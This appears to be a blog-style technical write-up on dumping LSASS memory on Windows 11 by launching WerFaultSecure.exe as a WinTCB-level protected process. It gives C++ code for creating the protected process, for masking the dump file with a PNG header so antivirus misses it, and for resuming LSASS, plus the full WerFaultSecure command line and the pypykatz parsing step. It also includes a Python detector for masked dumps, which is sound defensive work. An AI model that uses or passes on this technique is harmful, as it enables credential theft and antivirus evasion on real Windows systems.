Dumping LSASS on Windows 11
Result:

```
pypykatz lsa minidump proc.png
```

How it works:

PPLHelp is used to launch WerFaultSecure.exe as a WinTCB-level protected process.

Official documentation: ns-processthreadsapi-process_protection_level_information

```c
#define PROTECTION_LEVEL_WINTCB_LIGHT      0x00000000
#define PROTECTION_LEVEL_WINDOWS           0x00000001
#define PROTECTION_LEVEL_WINDOWS_LIGHT     0x00000002
#define PROTECTION_LEVEL_ANTIMALWARE_LIGHT 0x00000003
#define PROTECTION_LEVEL_LSA_LIGHT         0x00000004
#define PROTECTION_LEVEL_WINTCB            0x00000005
#define PROTECTION_LEVEL_CODEGEN_LIGHT     0x00000006
#define PROTECTION_LEVEL_AUTHENTICODE      0x00000007
#define PROTECTION_LEVEL_PPL_APP           0x00000008
#define PROTECTION_LEVEL_SAME              0xFFFFFFFF
#define PROTECTION_LEVEL_NONE              0xFFFFFFFE
```

Per the definitions above, the first argument to CreatePPLProcess in the code is 0, i.e. PROTECTION_LEVEL_WINTCB_LIGHT, the WinTCB level:
```cpp
if (!creator.CreatePPLProcess(0, commandLine)) {
    std::wcerr << L"Failed to create PPL process." << std::endl;
    CloseHandle(hDump);
    CloseHandle(hEncDump);
    CloseHandle(hCancel);
    return 0;
}
```
After WerFaultSecure.exe has finished running, the first bytes of the dump file are overwritten with the PNG magic header:

```
89 50 4E 47
```

This is done so that AV products do not flag the dump file:

```cpp
BYTE data[4] = { 0x89, 0x50, 0x4E, 0x47 }; // PNG magic header
// Overwrite the dump's magic header so AV scanners do not recognise it as a minidump
// Move the file pointer to the beginning of the file
DWORD bytesWritten;
SetFilePointer(hDump, 0, NULL, FILE_BEGIN);
if (!WriteFile(hDump, data, sizeof(data), &bytesWritten, NULL)) {
    std::cerr << "Error writing to file: " << GetLastError() << std::endl;
}
```
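Overwriting only the four-byte signature leaves the rest of MINIDUMP_HEADER intact, which is exactly what a defender can check for. The following is an added example written for this article (not code from the tool or the original post): it classifies a file as a real PNG, a normal minidump, or a minidump masked with the PNG magic, by validating the header fields that follow the signature. The sample inputs are constructed inline, and the upper bound on NumberOfStreams is a heuristic assumption, not a format rule.

```python
import struct

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"   # full 8-byte PNG file signature
MDMP_SIGNATURE = b"MDMP"                # MINIDUMP_HEADER.Signature
MINIDUMP_VERSION = 0xA793               # low 16 bits of MINIDUMP_HEADER.Version
MINIDUMP_HEADER_SIZE = 32               # sizeof(MINIDUMP_HEADER)
MINIDUMP_DIRECTORY_SIZE = 12            # sizeof(MINIDUMP_DIRECTORY)
MAX_PLAUSIBLE_STREAMS = 0x100           # heuristic bound (assumption)


def classify_dump_file(data: bytes) -> str:
    """Return 'png', 'minidump', 'masked-minidump' or 'unknown'.

    A genuine PNG carries the whole 8-byte signature. A minidump whose first
    four bytes were replaced by 89 50 4E 47 only matches the first half, and
    still has a consistent Version / NumberOfStreams / StreamDirectoryRva.
    """
    if len(data) < MINIDUMP_HEADER_SIZE:
        return "unknown"
    if data.startswith(PNG_SIGNATURE):
        return "png"
    sig = data[:4]
    version, n_streams, dir_rva = struct.unpack_from("<III", data, 4)
    header_consistent = (
        (version & 0xFFFF) == MINIDUMP_VERSION
        and 0 < n_streams < MAX_PLAUSIBLE_STREAMS
        and dir_rva >= MINIDUMP_HEADER_SIZE
        and dir_rva + n_streams * MINIDUMP_DIRECTORY_SIZE <= len(data)
    )
    if sig == MDMP_SIGNATURE and header_consistent:
        return "minidump"
    if sig == PNG_SIGNATURE[:4] and header_consistent:
        return "masked-minidump"
    return "unknown"


def _build_header(signature: bytes, n_streams: int = 3) -> bytes:
    # Constructed MINIDUMP_HEADER: Signature, Version, NumberOfStreams,
    # StreamDirectoryRva, CheckSum, TimeDateStamp, Flags (ULONG64),
    # followed by an empty stream directory so the RVA check holds.
    hdr = signature + struct.pack("<IIIIIQ", 0x0001A793, n_streams, 32, 0, 0, 0)
    return hdr + b"\x00" * (MINIDUMP_DIRECTORY_SIZE * n_streams)


SAMPLE_MINIDUMP = _build_header(MDMP_SIGNATURE)            # constructed
SAMPLE_MASKED = b"\x89PNG" + SAMPLE_MINIDUMP[4:]            # constructed: after the WriteFile above
SAMPLE_PNG = PNG_SIGNATURE + b"\x00" * 40                   # constructed
```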
WerFaultSecure leaves the LSASS process suspended; PROCESS_SUSPEND_RESUME is used to resume (or suspend) it:

```cpp
// Forward declaration; the body of the resume loop is not reproduced here
void ResumeProcessLoop(DWORD pid);

// Create a thread to run ResumeProcessLoop
std::thread resumeThread(ResumeProcessLoop, targetPID);
// Detach the thread so it runs independently
resumeThread.detach();
```
WerFaultSecure process arguments

The /type value is a MINIDUMP_TYPE flag combination; see ne-minidumpapiset-minidump_type.

```
c:\\TEMP\\WerFaultSecure.exe /h /pid <LSASS process ID> /tid <LSASS main thread ID> /file <passed file handle value> /encfile <passed file handle value> /cancel <passed event handle value> /type 268310
```